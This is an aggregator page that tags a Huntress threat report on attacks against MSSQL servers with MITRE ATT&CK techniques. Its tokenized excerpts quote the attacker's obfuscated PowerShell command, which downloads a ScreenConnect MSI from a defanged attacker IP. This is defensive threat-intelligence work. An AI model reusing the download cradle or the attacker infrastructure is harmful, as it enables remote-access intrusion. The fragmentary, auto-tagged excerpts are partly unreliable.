TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

MSSQL to ScreenConnect | Huntress

2024-03-28 · Read original ↗

ATT&CK techniques detected

11 predictions
T1059.001PowerShell
98%
“timing and sequence of commands appearing on multiple endpoints, across different customer infrastructures, appears to indicate a script or playbook was being followed, possibly in an automated fashion. indicator 185. 56. 83 [. ] 82 - initial “ c2 ” ip address ( target for finger…”
T1059.001PowerShell
89%
“##i again, it should be noted that prior to this command, there were no visible commands that would have led to the file 1. msi being downloaded to the endpoints. on both endpoints, the above command line was immediately followed in the investigative timeline with msiinstaller re…”
T1059.001PowerShell
77%
“. exe, following the successful exploit of the owasrrf vulnerability. approximately 100 minutes later, on both endpoints, two commands encoded by converting each character to its decimal equivalent, separated by “ + ”, were visible in edr telemetry. an excerpt of the command line…”
T1059.001PowerShell
72%
“= ' d ' + ' own ' + ' loa ' + ' dfi ' + ' le ' ; invoke - expression ( new - object net. webclient ). $ ds. invoke ( ' ' http : / / 95. 179. 241 [. ] 10 : 23963 / bin / connectwisecontrol. clientsetup. msi? e = access & y = guest ' ', ' ' c : \ windows \ temp \ 2. msi ' ' ) power…”
T1059.001PowerShell
70%
“as follows : " c : \ windows \ system32 \ cmd. exe " / c powershell - nop - c $ ds = ' d ' + ' own ' + ' loa ' ' + ' dfi ' + ' le ' ; invoke - expression ( new - object net. webclient ). $ ds. invoke ( ' http : / / 95. 179. 241 [. ] 10 : 23963 / bin / connectwisecontrol. clientse…”
T1218.007Msiexec
55%
“as follows : " c : \ windows \ system32 \ cmd. exe " / c powershell - nop - c $ ds = ' d ' + ' own ' + ' loa ' ' + ' dfi ' + ' le ' ; invoke - expression ( new - object net. webclient ). $ ds. invoke ( ' http : / / 95. 179. 241 [. ] 10 : 23963 / bin / connectwisecontrol. clientse…”
T1059Command and Scripting Interpreter
50%
“timing and sequence of commands appearing on multiple endpoints, across different customer infrastructures, appears to indicate a script or playbook was being followed, possibly in an automated fashion. indicator 185. 56. 83 [. ] 82 - initial “ c2 ” ip address ( target for finger…”
T1218.007Msiexec
49%
“. msi and determined that the screenconnect instance id tied to the installer is f722dcd0838a377e, and that it connects to 95. 179. 241 [. ] 10. there were no indications that the screenconnect instance was successfully installed on any of the monitored endpoints. reviewing the i…”
T1190Exploit Public-Facing Application
39%
“timing and sequence of commands appearing on multiple endpoints, across different customer infrastructures, appears to indicate a script or playbook was being followed, possibly in an automated fashion. indicator 185. 56. 83 [. ] 82 - initial “ c2 ” ip address ( target for finger…”
T1059.003Windows Command Shell
35%
“mssql to screenconnect | huntress background huntress soc analysts continue to see alerts indicating malicious activity on endpoints running mssql server or mssql express, either as stand - alone installations, or as part of a larger application package installation. a recent ser…”
T1048Exfiltration Over Alternative Protocol
31%
“the commands involved in the attack were similar, and appeared to be automated in nature. the first indication of the attack was an mssql event id 15281 record within the application event log, indicating that access to a stored procedure was blocked, as illustrated in figure 2. …”

Summary

Huntress continues to see MSSQL server systems being attacked, and in recent incidents have seen overlap with previous incidents, not only in the use of LOLBins, but also in IP addresses used by the threat actor.